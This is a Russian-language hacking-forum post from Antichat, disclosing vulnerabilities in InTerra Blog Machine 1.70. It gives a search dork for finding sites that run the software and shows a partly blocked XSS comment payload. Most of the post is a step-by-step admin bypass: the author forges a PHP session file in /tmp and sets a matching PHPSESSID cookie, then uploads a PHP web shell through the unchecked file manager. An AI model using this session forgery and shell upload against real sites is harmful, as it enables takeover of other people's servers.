HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости InTerra Blog Machine
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости InTerra Blog Machine
  #1  
Старый 08.01.2009, 00:31
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию Уязвимости InTerra Blog Machine
Уязвимости InTerra Blog Machine
Name : InTerra Blog Machine
Site : Dull.ru
Version : 1.70
Dork : "Powered by InTerra Blog Machine"

Существует хсс, но "раскрутить" до конца не получается, так как жестко фильтруется:
lib\safehtml\classes\safehtml.php

PHP код:
  // dangerous protocols
  var $BlackProtocols = array("javascript""vbscript""about""wysiwyg""data""view-source""ms-its""mhtml""shell""lynxexec""lynxcgi""hcp""ms-help""help""disk""vnd.ms.radio""opera""res""resource""chrome""mocha""livescript", ); 
Вообщем вот до чего дошол: (Добавление комент.)
Код:
<a href=`http://xek.comd" onclick='overflow'><i>wtf?<a style='font-size:30px; color:red;'>hekked</a></i>
А всё потому, что в actions\addcomment.php
PHP код:
                //prepare contents
                $comment strip_tags($_POST['comment'],"<a>,<i>,<b>"); 
Разрешины три тэги, но клас safehtml всё отрубает. Просьба кто будет смотреть присмотреться к етой хсс, возможна ли она там вообще.

Авторизация. Подмена сесии.

Всё гениально:

PHP код:
    //check access
    if(!$_SESSION['admin']){
        header("Location: " SERVER_ROOT);
        exit;
    } 
Собственно идем в /tmp
создаем сесию, права 0777:
sess_aaec41a3b692b6be0dc292e40b778595
Код:
admin|b:1;
Ну и вбиваем куку в браузере.
Цитата:
PHPSESSID=aaec41a3b692b6be0dc292e40b778595
После авторизации
Цитата:
http://127.0.0.1/interra/filemanager/
И заливаем шелл. Проверки нет (:
lib\uploader.class.php
PHP код:
        function copyFile($name,$destination){
            if(!$result move_uploaded_file($name,$destination)){
                $result copy($name,$destination);
            }
            return $result
        } 
Грузится в
Цитата:
http://127.0.0.1/interra/files/shell.php
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости. Обсуждения. 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости. Обсуждения. 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Современные информационные угрозы, четвертый квартал 2005 dinar_007 Мировые новости. Обсуждения. 3 28.01.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.